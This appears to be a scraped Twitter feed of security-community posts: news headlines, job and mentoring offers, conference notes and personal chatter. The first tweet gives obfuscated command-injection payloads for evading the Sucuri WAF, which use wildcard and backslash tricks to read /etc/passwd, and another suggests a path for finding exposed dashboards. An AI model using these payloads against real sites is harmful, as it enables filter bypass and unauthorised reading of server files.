Twitter | Search | |
Search Refresh
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 Aug 18
Sucuri { RCE }; payloads, dot shot. 🌪️ Smuggling RCE Payloads: </> /???/??t+/???/??ss?? </> Obfuscating RCE Payloads: </> ;+cat+/e'tc/pass'wd </> </> c\\a\\t+/et\\c/pas\\swd </>
Reply Retweet Like
Hossam Sec Aug 18
Add this endpoint to your DIRs list You may get lucky and access a dashboard :) /uplynk/examples/dash.html Make your own private lists of DIRs while hunting and you may get lucky and access critical info
Reply Retweet Like
John McFarland Aug 16
Hey twitter. A public school is trying to build a Cybersecurity program disenfranchised kids that is looking for experts that would be willing to participate and help guide them on curriculum/programs. Would anyone be interested? DM me your info and let’s chat.
Reply Retweet Like
Florian Hansemann Aug 16
Bypassing Two-Factor Authentication on Outlook Web Access
Reply Retweet Like
Sam Houston Aug 16
Hey Friends: My partner’s friend has been Doxxed by White Supremecists. We are trying to help her with security advice and how to deal with this Dox attack. Does anyone know of any groups/resources for women and POC? cc
Reply Retweet Like
DFIR Training (Brett Shavers) Aug 18
Links to terabytes of forensic test images. Yes, that's right. Terabytes.
Reply Retweet Like
Laura Bell Aug 14
Advanced notice: I (me personally) will be looking for 1-2 people to formally mentor in in 2020. Criteria: * NZ based but _anywhere_ in NZ * From an under represented group * Age 17-70 * Not currently employed in More to follow soon via blog
Reply Retweet Like
Ty Aug 14
This is it! 2 days of amazing interaction and presentations at the AfricaHackOn conference. Pro tip: have your resume in soft copy somewhere because I’ll be recruiting for 2 network and 2 application security positions courtesy of .
Reply Retweet Like
Dan Jock 16h
What’s for breakfast? My “signature” French Toast -eggs -whole milk -vanilla -cinnamon -(out of nutmeg) -allspice
Reply Retweet Like
#AI 13h
Teen TalkTalk hacker ordered to pay £400k after hijacking popular Instagram account
Reply Retweet Like
Cyber Security Aug 19
107 hospitals are completely infected with ransomware; how will patients survive?
Reply Retweet Like
Infected Drake Aug 18
After weeks of research and experimentation with timing based side channel attacks on WAFs, I'm finally glad to present an article detailing my experiments. I hope you enjoy reading it as much as I enjoyed writing it up. Feedbacks appreciated.
Reply Retweet Like
rahlzle dazzle: LFW Aug 18
Interesting. friends, knowing most AV/Malware software will tattle online to mommy anyway, how do you feel about software that when blocking a web site known to have Malvertising sends you to a live link, at the AV companies website with the following in the URL; 1/
Reply Retweet Like
#AI 15h
Breaker, breaker. Apple's iOS 12.4 update breaks jailbreak break, un-breaks the break. 10-4
Reply Retweet Like
Florian Hansemann 19h
Reply Retweet Like
#AI Aug 15
Ethical Hackers Sabotage F-15 Fighter Jet, Expose Serious Vulnerabilities
Reply Retweet Like
Travis D. Mills 13h
Credit Karma glitch exposed users to other people’s accounts – TechCrunch
Reply Retweet Like
Cybernista_My, CISSP👩🏿‍💻 Aug 15
IT IS DONE!!!!! 🥳🥳🥳🥳 Praise God!!! I am official!!!! 🌟
Reply Retweet Like
Webroot Aug 17
REMINDER: It only takes one end user to compromise an entire business network. |
Reply Retweet Like
Constantin Schüßler 17h
Here are some snapshots of my one year anniversary today at . Thank you 🙏 to the amazing squad, to all our business partners and networks as well as everyone who interacted with us during the last year. Let’s keep rocking the world together! 😎
Reply Retweet Like